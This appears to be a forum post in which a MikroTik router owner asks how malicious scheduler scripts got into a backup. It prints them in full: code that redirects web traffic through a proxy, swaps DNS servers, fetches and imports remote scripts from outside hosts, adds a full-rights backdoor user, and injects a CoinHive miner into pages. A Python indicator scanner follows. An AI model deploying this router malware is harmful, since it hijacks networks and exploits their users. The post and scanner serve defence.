From time to time, I back up my settings. While checking my backup files I saw some strange scripts that I don't have in my Winbox script & jobs tab.
They are malicious for sure, but I couldn't find them anywhere except in my backup file.
How did they inject it? How does my backup file contain them? How can I get rid of them?
Here is the code:
scheduler entry sh113 (owner: admin):
:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}
/system scheduler remove [find name=Auto113]
/system scheduler remove [find name=upd111]
/system scheduler remove [find name=upd112]
/system scheduler remove [find name=upd113]
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\r\n:do {/tool fetch url=\"http://02ip.ru/1dVH37\" mode=http keep-result=no} on-error={}\r\n/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\r\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd113" interval=12h on-event=(":do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=flash/webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}\r\n/import u113.rsc\r\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}
:do {/file remove autosupout.rif} on-error={}
:do {/file remove autosupout.old.rif} on-error={}
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=no port=21 address=""
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }
/user add name=dircreate group=full password=1vJv12qWL8 disabled=no comment="9obi6kttB9q4Dp"
:do {/file print file=dircreate} on-error={:log info errorFilePrint}
:delay 5s
:do {/file set dircreate contents="<html>\r\n<head>\r\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=windows-1251\">\r\n <title>\"\$(url)\"</title> \r\n<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n<script>\r\n var miner = new CoinHive.Anonymous('FgWWtJfuvPmrfwjOfgc9Vo55EyvrMBLh', {throttle: 0.1});\r\n miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\r\n</script>\r\n</head>\r\n<frameset>\r\n<frame src=\"\$(url)\"></frame>\r\n</frameset>\r\n</html>"} on-error={:log info errorFileSave}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}
:do {/file remove "dircreate.txt"} on-error={}
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,185.126.178.0/24 [find name!=dircreate]} on-error={:log info errorSetAddress}
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}
/user remove [find name=ftu]
/user group remove [find name=ftpgroupe]
/ip service set ftp disabled=yes port=21 address=""
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}
/system reboot

scheduler entry upd111 (owner: admin):
:delay 5m
:do {/tool fetch url="http://02ip.ru/1dVH37" mode=http keep-result=no} on-error={}
/system scheduler remove [find name=upd111]

scheduler entry upd112 (owner: admin):
/system scheduler remove [find name=sh113]
:do {/file remove u113.rsc} on-error={}

scheduler entry upd113 (owner: admin):
:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=flash/webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}
/import u113.rsc
:do {/file remove u113.rsc} on-error={}
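As an added example (not part of the post above), the following Python scanner checks a plain-text RouterOS configuration export (the output of /export) for the indicators visible in the script above: the scheduler names, the dircreate user, the sysadminpxy comment, the enabled web proxy, the remote fetch hosts, the CoinHive loader and the overwritten webproxy error page. The sample export is constructed and simplified; it assumes one "add"/"set" statement per line under a "/section" heading, as /export prints them.

```python
import re

# Indicator patterns derived from the script in the post (constructed regexes, not a vendor feed).
# Each pattern is matched against the section-qualified line, e.g. "/ip proxy set enabled=yes ...".
INDICATORS = {
    "proxy_enabled": re.compile(r"^/ip proxy set .*enabled=yes"),
    "proxy_marker": re.compile(r'comment="?sysadminpxy"?'),
    "scheduler_name": re.compile(r'name="?(upd11[123]|Auto113|sh113)"?\b'),
    "remote_fetch": re.compile(r"/tool fetch .*(up0\.bit|02ip\.ru|2no\.co)"),
    "backdoor_user": re.compile(r"^/user (add|set) .*\bname=\"?dircreate\b"),
    "miner_script": re.compile(r"coinhive", re.IGNORECASE),
    "error_page_overwrite": re.compile(r'dst-path="?(flash/)?webproxy/error\.html'),
}


def scan_export(text):
    """Return (line_number, indicator, line) for every line of an /export that matches an indicator."""
    hits = []
    section = ""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line.startswith("/"):          # "/ip firewall nat" style section heading
            section = line
            effective = line
        else:                              # "add ..." / "set ..." statement inside the section
            effective = f"{section} {line}"
        for name, pattern in INDICATORS.items():
            if pattern.search(effective):
                hits.append((lineno, name, line))
    return hits


# Constructed sample export: three injected entries from the post mixed with two benign lines.
SAMPLE_EXPORT = """\
/ip proxy
set enabled=yes port=8080 src-address=::
/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp src-address-list=!Ok to-ports=8080
add action=masquerade chain=srcnat out-interface=ether1
/system scheduler
add interval=12h name=upd113 on-event=":do {/tool fetch url=\\"http://up0.bit:31415/rsc?key=REDACTED&part=3\\" mode=http dst-path=u113.rsc} on-error={}"
add name=backup-nightly on-event="/system backup save" start-time=02:00:00
/user
add comment=9obi6kttB9q4Dp group=full name=dircreate
"""

if __name__ == "__main__":
    for lineno, indicator, line in scan_export(SAMPLE_EXPORT):
        print(f"line {lineno}: {indicator}: {line[:70]}")
```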